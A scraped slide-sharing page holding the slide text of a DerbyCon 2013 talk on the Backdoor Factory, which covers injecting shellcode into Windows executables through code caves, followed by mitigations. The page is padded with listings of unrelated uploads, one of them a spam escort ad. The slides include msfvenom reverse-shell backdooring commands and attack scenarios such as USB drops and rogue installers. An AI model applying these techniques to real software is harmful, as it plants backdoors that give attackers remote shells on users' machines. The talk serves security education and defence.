UX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business GoalsUX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business Goals
FIDO Alliance
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
David Wilson
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Zilliz
 
NVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space ExplorationNVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space Exploration
Alison B. Lowndes
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
alexjohnson7307
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
Zilliz
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
janagijoythi
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
FIDO Alliance
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
SAI KAILASH R
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Nicolás Lopéz
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
AimanAthambawa1
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 

Recently uploaded (20)

UX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business GoalsUX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business Goals
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
 
NVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space ExplorationNVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space Exploration
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 

Patching Windows Executables with the Backdoor Factory | DerbyCon 2013

  • 1. Patching Windows Executables with the Backdoor Factory Joshua Pitts DerbyCon 2013
  • 2. Other Potential Titles • I’M DOWN WITH APT (yeah you know me) • Lassie, did Timmy fall in a Code Cave again?? • Why I Cyber and How You Can Cyber too • When ET met EMET (A Love Story) • Hugging Your Way to the Top, One Hug at a Time • How I Owned Your Mother
  • 3. About Me • US Marine, Pre-911: SIGINT • Past: IT and Physical Security Auditor, Operational Security Lead, Malware and Forensic Analyst • Current: Reverse Engineer, Pentester • Python, C/C++, ASM (INTEL) • I have certs.. Serious inquires only :P • Currently work at Leviathan Security Group
  • 5. Overview • History of Patching • How I learned to patch binaries • The Backdoor Factory – Features – Capabilities • Demos (Live and Video) • Mitigations • Going forward
  • 6. What is Patching Definition (Wikipedia): A patch is a piece of software designed to fix problems with, or update a computer program or its supporting data. This includes fixing security vulnerabilities and other bugs, and improving the usability or performance.
  • 7. For This Presentation My Definition: Adding or taking away content or functionality to a compiled binary.
  • 8. Security Pros and Patching • Red Teaming – persistence in plain sight • Pentesting/Social Engineering – Salt all the parking lots! • Research – Just because :D • Malware/Code analysis – Break the anti-analysis code
  • 9. History of Patching Good thing we don’t do this with operating systems.
  • 10. The MS Method • MSP – Windows install patch file. • Contains at least two data transforms – One updates the install database – One has info that the installer uses for ‘patching files’ • The installer will then use this info to apply the patch from the cabinet file • Yada Yada Yada…
  • 11. What does this mean? MS definition of patching is replacing old registry entries, dlls, and exes with new items Not the patching that we’re taking about today
  • 12. How Key Gens/Crackers do it • Find code branch(es) that validate(s) the software’s protection mechanism(s) • Make it return to a value that meets a valid condition for approved/continued operation • Sometimes its a function that returns a True/False (0/1) value after the check.
  • 13. How Metasploit Patches • msfvenom –p windows/shell_reverse_tcp –x psexec.exe … The overwrite program entry method • msfvenom –p windows/shell_reverse_tcp –x psexec.exe –k … The allocate and create thread and return to original program entry method (Keep)
  • 14. MSF Overwrite program Entry - Before
  • 15. MSF Overwrite program Entry - After
  • 16. Pros/Cons • PRO: Attacker receives a shell (or 17) :D • PRO: Size of EXE not changed • CON: No continued execution of program – WIN - LOSE
  • 17. MSF Create Thread Method (Keep) When debugging in Immunity Debugger
  • 18. MSF Create Thread Method (Keep) Immunity is telling the truth, memory sections: Original memory sections:
  • 19. Msfvenom x32 Keep Method Explained • Two separate functions or stubs • Part Two: The shellcode payloads that we all know • Part One: Is not new, not so well known, but is awesome • Looks like an un-named section of code that has RWE attributes (very suspicious) • Very important for stager payloads
  • 21. Pros And Cons of the Msfvenom Keep Method • PRO: Attacker receives shell and the binary works ‘normally’ for the user – That’s a WIN-WIN • CON: Should be easy for AV to catch • CON: Size of binary has increased
  • 22. MSFVenom Win64 Patching Support Only supports x32 – Submitted a bug post on security street – A feature request was submitted (#8383):
  • 24. The Portable Executable Format MS-DOS 2.0 HEADER and unused space OEM ID/INFO OFFSET to PE header MS-DOS 2.0 Stub and Reloc table And unused Space PE Header Section Headers Import pages (import/export info Base reloc info Resource info) • Not much has changed in the last 20 or so years • Must be backwards compatible (win8 must read the header) • Easy to automatically manipulate • http://msdn.microsoft.com/library/windows/har dware/gg463125
  • 25. The Common Object File Format (COFF) Format Microsoft COFF Header (machine type, number of sections, etc..) Section Headers Raw Data Code Data Debug Info Relocations • This is included in the PE File Format • The most important section for RE • Includes: - Machine Type - Number of Sections - Size and Access (RWE) of Sections • Typically includes the rest of the file Code, Data, Debug, Reloc (the actual sections)
  • 27. How I learned to Backdoor Windows Binaries • Though the Offensive Security Cracking the Perimeter course – Duh • Manual Labor • Time Consuming – At first hours – Now about 10-15 mintues • Missing some important concepts: – Working with the import table – Working with staged payloads (stagers) – Multi cave jumping – win32 only (slight differences in x64 asm)
  • 28. CTP Methods • Append a new section of code – Similar to the Metasploit msfvenom keep – Named RWX section (e.g. .sdata, .moo, .what, etc…) • Use existing code caves for encoding/decoding shellcode in the appended section – We looked at XOR encoding – XOR encoding is no longer effective against AV
  • 31. Code Caves? A code cave is an area of bytes in a binary that contain a null byte pattern (x00) greater than two bytes.
  • 32. How are code caves created? • Not sure, so I did some research… • Or went on a quest…
  • 33. How are code caves created? • Starting out, I assumed that a unicorn would know everything. • So I went to defcon. • And what’s better than a unicorn at DEFCON!!!
  • 34. How are code caves created? Hi Unicorn! Hi.. err, human! How are code caves made? I don’t know.  Aww. Want a beer?  Pssst… Check compliers… o/
  • 35. How are code caves created? Tested the following x32 compilers: • G++ - GNU C++ • Cl.exe – MS compiler linker. • Lcc-win32 • Mingw32-c++
  • 36. How are code caves created? Against this code: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <windows.h> int array[600] = {0}; int main(int argc, char **argv) { printf("hello world"); return 0; } This Code is FREE as in BEER.
  • 37. Find Code Caves Demo Code: http://github.com/secretsquirrel/the-backdoor-factory Binaries: http://live.sysinternals.com
  • 38. How Are Code Caves Created? Results for code caves greater than 200 bytes in named sections (e.g. .text, .data, .idata, etc…): • Cl.exe : 7 • G++: 4 • Mingw32-c++: 3 • Lcc-win32: 0
  • 39. How Are Code Caves Created? • Remember this line of code: – int array[600] = {0}; • Not one had a cave of at least 600 bytes.
  • 40. How Are Code Caves Created? Lesson: If you want to minimize code caves in your code, carefully pick your compiler.** **More research could be done in this area.*** ***I don’t write compilers**** ****Nor do I want too… …yet :P
  • 42. Some Ideas • Automation • Split shellcode into smaller sections • Use multiple code caves • Non-sequential cave jumping • Use user provided shellcode • Combine the Metasploit Stager solution with the CTP code cave use
  • 43. Solution: BDF • x32 version released in March 2013 – Supported only single cave jumping – No x32 stagers support • Python27 - Single Script • Supports win32/64 – Supports x32 stagers – No stagers payloads for x64 yet. (Remember that bug feature request?) • Code Cave injection (single and multiple) • Support user-provided shellcode • Some Randomization (different hash every time an EXE is created) – Through random one’s compliment in the code – And different types of nops • Injector Module
  • 44. How BDF works • Enumerates PE/COFF Header format • Determines if binary is supported (win32/64 intel) • Locates code caves that correspond to size of shellcode • Patches executable in an attempt to return registers/flags to the original state for continued execution – Patches entry location with a JMP to the first selected code cave/appended section – Patches each user selected code cave
  • 45. How BDF works • Very primitive disassembler to do just what we need • Reworked the x32 msfvenom stager ‘keep’ stub to work in code caves and with user provided shellcode -x64 stager support is in the works • Reworked a handful of useful metasploit payloads to allow for multiple code cave jumping
  • 48. Now You Can Do This
  • 50. Demos • Support Check (Live) • Backdooring win32/64 binaries (Live) – Append code cave – Single code caving – Code Cave jumping • Mass backdooring (directory) - Live • Provide your own shellcode - Live • Prototyping shellcode (video) • The injector module (video)
  • 51. DEMO – Support Check • If not supported, then what? • Email me with the disassembly of the entry function (from a legitimate email) • I’ll send you the opcode update
  • 52. DEMO - Patch a file with shellcode win32/64 • Append • Pick a single Cave • Multi-Jumps • Note – Non-stager payloads will ‘hang’ if C2 is not available – Payloads are patched ‘in-line’ and not run in a separate thread
  • 53. DEMO - Mass backdooring (directory)
  • 54. DEMO - Prototyping shellcode
  • 55. DEMO – Injector Module • Injector is the hunt and backdoor binary of doom. • Use responsibly
  • 56. DEMO - Provide your own shellcode • Can be anything, just make sure it matches the process type (x32 for x32) • Make sure you use ExitFunction=Thread or you will kill the parent process (not good)
  • 57. Attack Scenarios or Methods • Salting Parking Lots with USBs • Hosting Rouge Exes • Attacking system services • Linux Setuid Attack for Windows – Patching binaries that require elevated perms but might be in non-admin directories • Sysinternal tools • Setup files
  • 58. Mitigations • UPX encoding • Self Validation • AVs • EMET 4.0+ • Hash verification • White Listing
  • 59. Mitigations - UPX Encoding • Not supported by BDF • Unpack – Patch – Pack • UPX is not protection against patching • Could opens your up your Exe to potential weaknesses – Are you unpacking to unprotected memory space?
  • 60. Mitigations - Self Validation • Team Viewer • Round Robin Checking • Find the check, patch it
  • 61. Mitigations – Anti-Virus’ • I broke the “rule” and uploaded my samples to Virustotal for this presentation • It really doesn’t matter • AV is dead
  • 62. MSFVENOM keep vs MSVENOM non-keep vs BDF Cave Jumping MSFVENOM –k –t exe Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
  • 63. MSFVENOM keep vs MSVENOM non-keep vs BDF Cave Jumping MSFVENOM –t exe Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
  • 64. MSFVENOM keep vs MSVENOM non-keep vs BDF Cave Jumping BDF Cave jumping Hash: 5620ba8c64ff0d9cde65eda4156fbb85186f2bd0f16636cded5c9a0d8024d4e9
  • 65. win32 BDF vs win64 BDF ZoomIt.exe vs ZoomIt64.exe
  • 66. EMET 4.0+ FTW? • If you use position-independent shellcode (metasploit) • And the target binary is protected by EMET… • And the Caller protection setting is enabled… • And the application is running as win32… • EMET will stop this type of attack!
  • 67. EMET 4.0+ FTW? • If the binary executes as a win64 process • EMET will not stop this type of attack! From the EMET 4.0 User Guide:
  • 68. Mitigations - Whitelisting • Based on what you’ve seen today, why would you use trust AV. • There are whitelisting vendors, I’m not endorsing any of them • I did not test it, but they “should” work – if based on hashing verification and not name • Not the end game solution (e.g. powershell memory injection)
  • 69. Enterprise Mitigations • Don’t let end users download binaries • Verify Your Binaries before Deploying – Verify hashes – Conduct forensic analysis and testing – Look at network traffic – Etc…
  • 70. Road Map • x64 stub to support staged payloads • Support Mach-O and ELF formats • Patch the IAT and api pointers to shorten required shellcode and elimiate ROP-like calls • MITM patching of binaries during download
  • 71. Progress on x64 Stager

Editor's Notes

  1. Changes: Entry location and the code at entry.
  2. First stub:Allocates memoryCopies 2ndshellcode into memoryCreates and launches it a separate thread
  3. From hopper disassembler for mac The outer blue lines show jumps to greater memory addresses The red line show jumps to lesser memory addresses
  4. On Mac test on win7
  5. On Mac
  6. On mac, test on win7
  7. On win 8.1 with MSSE binary
  8. On Mac
  9. X64 shellcode is the way to go.